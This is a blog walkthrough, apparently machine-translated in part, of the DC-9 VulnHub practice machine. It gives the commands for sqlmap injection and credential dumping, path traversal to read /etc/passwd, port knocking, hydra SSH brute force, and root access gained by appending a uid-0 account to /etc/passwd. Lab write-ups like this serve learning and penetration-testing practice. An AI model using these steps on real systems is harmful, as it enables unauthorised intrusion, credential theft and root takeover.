当前位置:网站首页>DC-9--vulnhub range
DC-9--vulnhub range
2022-08-06 13:13:00 【against the wind/】
https://www.vulnhub.com/entry/dc-9,412/
网络模式:NAT
攻击机:kali
1、主机发现
arp-scan -l

nmap -p- 192.168.194.170

80端口开放,22端口被过滤,后面会用到

可能会有SQL注入,使用1’ or 1=1#显示全部,所以存在
使用burpsuitesThe captured packets are saved as filespost.txt,
sqlmap爆破
sqlmap -r /home/kali/Desktop/post.txt --dbs
使用-r参数

sqlmap -r /home/kali/Desktop/post.txt -D users --tables
sqlmap -r /home/kali/Desktop/post.txt -D users -T UserDetails --columns
sqlmap -r /home/kali/Desktop/post.txt -D users -T UserDetails -C username,password --dump

还有另一个staff库
使用admin 和 transorbital1登录

发现
File does not exist
2、存在文件包含
Try common parameters to get file
http://192.168.194.170/manage.php?file=…/…/…/…/…/…/etc/passwd
3、knockd敲门服务
http://192.168.194.170/manage.php?file=…/…/…/…/…/…/etc/knockd.conf
It's clearer by looking at the source file
敲门 Knockd,percussion method:nc、nmap,参考
for x in 7469 8475 9842;do nmap ‐Pn ‐‐max‐retries 0 ‐p $x 192.168.194.170;done
for x in 7469 8475 9842 22 ;do nc 192.168.194.170 $x;done
此时22端口开放
Use the previously blasted user passwordhydra爆破
hydra -L dc9pass -P dc9pass2 192.168.194.170 ssh -t 20

Try to log in to this account,只有janitor的家目录存在一个名为.secrets-for-putin的文件夹,并且在其中又得到一些密码
4、提权
#python test.py read append The meaning of reading content and adding content
openssl passwd -1 -salt admin 123456
1 1 1admin$LClYcRe.ee8dQwgrFc5nz.
echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd
cd /opt/devstuff/dist/test
sudo ./test /tmp/passwd /etc/passwd

边栏推荐
猜你喜欢

Web网页端IM产品RainbowChat-Web的v4.1版已发布

动物主题网页设计(小白必看)

Multiple knapsack problem ← scale hour can be transformed into 0-1 knapsack problem
![[TypeScript] In-depth study of TypeScript decorators](/img/c9/5246411eafe6acf84aa2cc8b3b0157.png)
[TypeScript] In-depth study of TypeScript decorators

Promrtheus etcd 监控

Web网页端IM产品RainbowChat-Web的v4.1版已发布

解决创建虚拟机时No DEFAULT or UI configuration directive found问题

速览muduo组成结构

你对数据库与数据处理了解吗?

SAP 特征 Classification
随机推荐
重写muduo网络库开发环境和前期准备
SQL图解面试题:如何找到喜欢的电影?(表连接,语句执行顺序、模糊查询)
Luogu P1776: Treasure Screening ← Multiple Knapsack Problem Binary Optimization
MODBUS转PROFINET网关将电力智能监控仪表接入PROFINET网络案例
易知微数字孪生智慧港口|打造智能化调度综合管控“大脑”,实现港口建设“新升级”
力扣练习——47 二叉树中的最大路径和
Unity工具类 ResourcesManager资源管理器
洛谷 P1776:宝物筛选 ← 多重背包问题 二进制优化
Q295HR钢板化学成分
leetcode.10 Regular Expressions
Extension and customization of Istio
40 degrees high temperature, how to find the coolest place indoors through SOLIDWORKS?
Learn more TypeScript 】 【 TypeScript namespace
SQL图解面试题:如何分析员工奖金?(多表连接、case when)
Web网页端IM产品RainbowChat-Web的v4.1版已发布
DC-9--vulnhub靶场
eventfd和__thread的应用
你对数据库与数据处理了解吗?
[Geek Challenge 2019] BabySQL 1
Hands-on deep learning_ResNet

